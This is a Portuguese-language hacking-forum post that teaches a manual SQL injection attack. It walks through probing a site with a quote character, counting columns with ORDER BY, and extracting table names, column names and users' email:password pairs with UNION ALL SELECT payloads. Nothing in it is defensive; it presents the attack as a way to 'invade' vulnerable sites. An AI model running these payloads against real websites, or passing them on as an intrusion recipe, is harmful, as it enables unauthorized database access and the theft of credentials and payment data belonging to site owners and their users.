Ir para conteúdo
  • 2 Quem está por aqui   0 membros estão online

    • Nenhum usuário registrado visualizando esta página.

Como está realizando invasão SQL manualmente (SQL Injection Manual)


Dark Army
 Compartilhar

Posts Recomendados

1. Procure um site com vulnerabilidade SQL, já fiz um post de como está achando.
Coloque um ' no final da URL do site, caso apareça algum erro, é vulnerável :)
Exemplo:
cats88.jpg.681e9de718d185fdafef7c95b35dfd2e.jpg

 

2. Agora no final da URL, retire o ' e coloque order by 1 
Se o site carregar normalmente sem erro, coloque order by 1,2
E assim por diante, até aparecer o erro novamente.
No caso, o erro apareceu em order by 1,2,3,4. Então o site possui somente 3 colunas.

 

3. Agora vamos unir as colunas, apague tudo da URL, e coloque: union all select *números de colunas*, exemplo: union all select 1,2,3-- e coloque - depois do =, exemplo:

É necessário se cadastrar para acessar o conteúdo.
union all select 1,2,3--

 

Agora vamos listar as tabelas:

É necessário se cadastrar para acessar o conteúdo.
union all select 1,group_concat(table_name),3 from information_schema.tables where table_schema =database()--

 

E pronto, já apareceu as tabelas, que no caso são:
artists,carts,categ,featured,guestbook,pictures,products,users

 

4. Gostaria de saber as informações da tabela "users" somente, então vamos realizar esse comando:
union all select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--

 

Exemplo:

É necessário se cadastrar para acessar o conteúdo.
union all select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--

 

Resultado: uname,pass,cc,address,email,name,phone,cart

 

5. Vamos pegar finalmente, as informações, com o seguinte comando:
union all select 1,concat(email,0x3a,pass),3 from users--

 

*OBS: O 0x3a, é :, que vai separar o email:pass.*

 

Exemplo:

É necessário se cadastrar para acessar o conteúdo.
union all select 1,concat(uname,0x3a,email,0x3a,pass),3 from users--

 

Resultado: test:[email protected]:test

 

E pronto, foi realizada a invasão manualmente.

Editado por Dark Army
  • Curtir 7
  • Amei 1

 ♚ KING RETURN ♚

 

Link para o comentário
Compartilhar em outros sites

Crie uma conta ou entre para comentar

Você precisar ser um membro para fazer um comentário

Criar uma conta

Crie uma nova conta em nossa comunidade. É fácil!

Crie uma nova conta

Entrar

Já tem uma conta? Faça o login.

Entrar Agora
 Compartilhar

×
×
  • Criar Novo...

Informação Importante

Nós fazemos uso de cookies no seu dispositivo para ajudar a tornar este site melhor. Você pode ajustar suas configurações de cookies , caso contrário, vamos supor que você está bem para continuar.